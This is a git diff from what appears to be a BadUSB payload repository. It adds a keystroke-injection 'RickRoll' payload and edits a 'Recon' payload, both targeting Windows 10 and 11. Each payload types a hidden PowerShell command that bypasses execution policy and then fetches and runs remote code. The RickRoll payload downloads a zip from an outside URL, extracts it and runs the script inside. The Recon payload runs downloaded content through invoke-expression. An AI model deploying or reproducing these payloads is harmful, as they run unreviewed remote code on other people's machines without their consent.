diff --git a/Payloads/FLIP-ADV-RickRoll/ADV-RickRoll.txt b/Payloads/FLIP-ADV-RickRoll/ADV-RickRoll.txt new file mode 100644 index 0000000..78ded0a --- /dev/null +++ b/Payloads/FLIP-ADV-RickRoll/ADV-RickRoll.txt @@ -0,0 +1,12 @@ +* Title: ADV-RickRoll +* Author: I am Jakoby +* Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume. +* Upon deployment payload will pause until a mouse movement is detected and run once one is. +* Target: Windows 10, 11 +* -------------------------------------------------------------------------------------- +* THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. +* -------------------------------------------------------------------------------------- +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1 +ENTER \ No newline at end of file diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.txt b/Payloads/Flip-ADV-Recon/ADV-Recon.txt index 6f35cdf..5ff3dc0 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.txt +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.txt @@ -8,7 +8,7 @@ REM Target: Windows 10, 11 REM GUI r DELAY 500 -STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl ENTER REM REM Remember to replace the link with your DropBox shared link for the intended file to download diff --git a/README.md b/README.md index 9f047a0..c6b45dd 100644 --- a/README.md +++ b/README.md @@ -28,7 +28,7 @@ ![hak 5](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/hak5-sub.png) ## The Functions -🧬 + | Functions | Description | | :------------------------------------------------ | :------------------------------------------------------------------------------------------------------------------------------------------------------------------ |